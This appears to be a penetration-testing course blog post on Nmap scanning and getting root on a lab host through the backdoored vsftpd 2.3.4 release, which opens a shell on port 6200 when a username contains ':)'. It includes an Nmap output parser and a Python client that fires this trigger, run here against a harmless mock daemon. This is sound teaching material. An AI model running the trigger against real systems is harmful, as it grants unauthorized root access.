It's recon, smile please. [Service vulnerable to a smile]

                                   The prettiest smiles hide the deepest secrets




Hi all, with a big smile (don't ask me why, you will get to know later). So today we will continue our PWK journey. We were in the active reconnaissance stage, where we interact with our target directly. Today we will be learning:

  • How to scan ports
  • Run the Metasploit Framework
  • Use an exploit, run it against the target and get root-level access
  • Look into a purposely vulnerable service; in our case we can call it a backdoor :)


So let's start.


What is port scanning?
Port scanning is the process of checking for open TCP and UDP ports on a remote machine. I prefer to perform port scanning with a tool called Nmap, which is the most widely used port scanner in the infosec community.

There are good books available for Nmap at https://nmap.org/book/ ; check out the link, and if you find interesting ones, suggest them to me and I will have a look.

Only fun here, no serious business. So let's run Nmap. We will be using these switches:
-sV: service/version detection, so we learn what software is listening on each open port and which version it reports
-O: OS detection (easy to guess). Note that -O needs raw sockets, so run Nmap as root (or with sudo) for it to work.
-p1-65535: scan every TCP port rather than Nmap's default top 1000, so an odd high port does not get missed.

Command: nmap -sV -O 192.168.0.14 -p1-65535
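Reading a full 65535-port -sV scan off a screenshot is error-prone, so here is an added example (my own code, not from the post) that parses Nmap's grepable output format (`-oG -`) and pulls out the service and version fields. The SAMPLE text is constructed to look like what the command above would print against the lab target; it is not output copied from the post, and the host and versions in it are illustrative.

```python
"""Parse nmap grepable (-oG) output and triage services by name/version."""
import re
from typing import Dict, List, Tuple

# Constructed sample, shaped like `nmap -sV -O -p1-65535 -oG - 192.168.0.14`.
SAMPLE = (
    "# Nmap 7.94 scan initiated as: nmap -sV -O -p1-65535 -oG - 192.168.0.14\n"
    "Host: 192.168.0.14 ()\tStatus: Up\n"
    "Host: 192.168.0.14 ()\tPorts: 21/open/tcp//ftp//vsftpd 2.3.4/, "
    "22/open/tcp//ssh//OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)/, "
    "23/open/tcp//telnet//Linux telnetd/, 25/filtered/tcp//smtp///"
    "\tIgnored State: closed (65531)\n"
    "# Nmap done -- 1 IP address (1 host up) scanned in 35.21 seconds\n"
)

# (port, state, proto, service, version)
PortInfo = Tuple[int, str, str, str, str]


def parse_ports_field(line: str) -> List[PortInfo]:
    """Split a 'Ports:' field; entries are port/state/proto/owner/service/rpcinfo/version/."""
    m = re.search(r"\tPorts: ([^\t]*)", line)
    if not m:
        return []
    out: List[PortInfo] = []
    for entry in m.group(1).split(", "):
        fields = entry.split("/")
        if len(fields) < 7:
            continue  # malformed entry: skip it rather than crash the triage
        port, state, proto, _owner, service, _rpc, version = fields[:7]
        out.append((int(port), state, proto, service, version))
    return out


def parse_grepable(text: str) -> Dict[str, List[PortInfo]]:
    """Map each host in the output to the ports reported for it."""
    hosts: Dict[str, List[PortInfo]] = {}
    for line in text.splitlines():
        if line.startswith("Host: "):
            host = line.split()[1]
            hosts.setdefault(host, []).extend(parse_ports_field(line))
    return hosts


def open_ports(hosts: Dict[str, List[PortInfo]], host: str) -> List[int]:
    """Sorted list of ports nmap reported as open for one host."""
    return sorted(p[0] for p in hosts.get(host, []) if p[1] == "open")


def find_service(hosts: Dict[str, List[PortInfo]], name: str) -> List[Tuple[str, int, str]]:
    """(host, port, version) for every open port whose service name matches."""
    return [(h, port, ver) for h, ports in hosts.items()
            for port, state, _proto, svc, ver in ports
            if state == "open" and svc == name]


if __name__ == "__main__":
    scan = parse_grepable(SAMPLE)
    print("open ports:", open_ports(scan, "192.168.0.14"))
    print("ftp banners:", find_service(scan, "ftp"))
```

Feed it a real file with `parse_grepable(open("scan.gnmap").read())`; the version string it returns for port 21 is exactly what you then search for in Metasploit or searchsploit.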

                           You guys wanna see the magic? Allow me to call Jarvis.



 In the Iron Man movies, J.A.R.V.I.S. is Tony Stark's natural-language user interface computer system.

J.A.R.V.I.S., run the command in Kali and get a screenshot for my friends. It is so easy, right?



OK, OK, I will stop my blah blah blunders, so follow the screenshots.



Finally we are in the victim machine with root-level access. Good, but the question is how. It was because of a backdoor in the vsftpd service (the tampered vsftpd 2.3.4 release). Sure, we will do code analysis of the vsftpd service.
In the above screenshot, after grabbing the banner we did something interesting: instead of logging in we sent a username containing the two bytes 0x3a 0x29. 0x3a is ':' and 0x29 is ')', so together these two characters make a smiley face. Yes, somebody deliberately put that backdoor into the service's source code (the 2.3.4 tarball on the download site had been tampered with; it is not something the project's author wrote).




Yes, when that else-if condition is met, the vsf_sysutil_extra function gets executed: it creates a socket, binds it to TCP port 6200, listens, and hands whoever connects a shell. Because the daemon is still running as root at that point, the shell is a root shell, which is the connection we used to get in.
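To make the two-stage nature of the trigger concrete, here is an added example (my own code, not vsftpd's and not from the post) that drives the exchange against a constructed mock daemon. MockVulnFtpd only reproduces the documented behaviour of the backdoored 2.3.4 build: a USER argument containing 0x3a 0x29 makes it open a second listening port (6200 on the real daemon; a free port here, so the demo runs anywhere) and serve that port to whoever connects. The "shell" on the second port answers `id` with a canned line instead of exec'ing /bin/sh, so the mock is harmless. All class and function names are mine.

```python
"""Two-stage smiley trigger, run against a constructed mock (not vsftpd's code)."""
import socket
import threading
import time

SMILEY = bytes([0x3A, 0x29])  # ":" then ")"


def contains_smiley(buf: bytes) -> bool:
    """The trigger test: 0x3a immediately followed by 0x29, anywhere in buf."""
    return any(buf[i] == 0x3A and buf[i + 1] == 0x29 for i in range(len(buf) - 1))


def pick_free_port() -> int:
    """Stand-in for the fixed port 6200 so the demo never collides with a real service."""
    with socket.socket() as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


class MockVulnFtpd(threading.Thread):
    """Banner, USER/PASS, and the hidden branch (constructed stand-in, not vsftpd)."""

    def __init__(self, shell_port: int):
        super().__init__(daemon=True)
        self.shell_port, self.triggered = shell_port, False
        self.sock = socket.socket()
        self.sock.bind(("127.0.0.1", 0))
        self.sock.listen(5)
        self.port = self.sock.getsockname()[1]

    def run(self):
        while True:
            try:
                conn, _ = self.sock.accept()
            except OSError:
                return
            threading.Thread(target=self._session, args=(conn,), daemon=True).start()

    def _session(self, conn):
        with conn:
            conn.sendall(b"220 (vsFTPd 2.3.4)\r\n")  # constructed banner
            buf = b""
            while data := conn.recv(1024):
                buf += data
                while b"\r\n" in buf:
                    line, buf = buf.split(b"\r\n", 1)
                    cmd, _, arg = line.partition(b" ")
                    if cmd.upper() == b"USER" and contains_smiley(arg):
                        self.triggered = True
                        self._open_shell_port()  # the hidden "else if" branch
                        while conn.recv(1024):   # real daemon is now stuck in accept()
                            pass                 # and never answers this session
                        return
                    if cmd.upper() == b"USER":
                        conn.sendall(b"331 Please specify the password.\r\n")
                    elif cmd.upper() == b"PASS":
                        conn.sendall(b"530 Login incorrect.\r\n")
                    else:
                        conn.sendall(b"500 Unknown command.\r\n")

    def _open_shell_port(self):
        srv = socket.socket()
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("127.0.0.1", self.shell_port))
        srv.listen(1)
        threading.Thread(target=self._shell, args=(srv,), daemon=True).start()

    @staticmethod
    def _shell(srv):
        with srv:
            client, _ = srv.accept()
        with client:  # canned reply stands in for execl("/bin/sh", ...)
            cmd = client.recv(1024).strip()
            client.sendall(b"uid=0(root) gid=0(root)\n" if cmd == b"id" else b"sh: not found\n")


def trigger_backdoor(host, ftp_port, shell_port, user: bytes, timeout=5.0):
    """Send USER <user>, then poll the second port; returns the shell's reply or None."""
    with socket.create_connection((host, ftp_port), timeout=timeout) as ftp:
        if not ftp.recv(1024).startswith(b"220"):
            return None
        ftp.sendall(b"USER " + user + b"\r\n")
        ftp.sendall(b"PASS x\r\n")               # never answered once triggered
        deadline = time.monotonic() + timeout
        while True:                               # the listener appears asynchronously
            try:
                shell = socket.create_connection((host, shell_port), timeout=1.0)
                break
            except OSError:
                if time.monotonic() > deadline:
                    return None
                time.sleep(0.1)
        with shell:
            shell.sendall(b"id\n")
            return shell.recv(1024).decode().strip()


if __name__ == "__main__":
    srv = MockVulnFtpd(pick_free_port())
    srv.start()
    print(trigger_backdoor("127.0.0.1", srv.port, srv.shell_port, b"anonymous" + SMILEY))
```

The retry loop in trigger_backdoor is the part people forget when scripting this by hand: the FTP session never answers after the trigger, so you cannot wait for a reply; you have to connect to the second port until it accepts. A username without the two bytes goes through the normal 331/530 path and the second port never opens.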
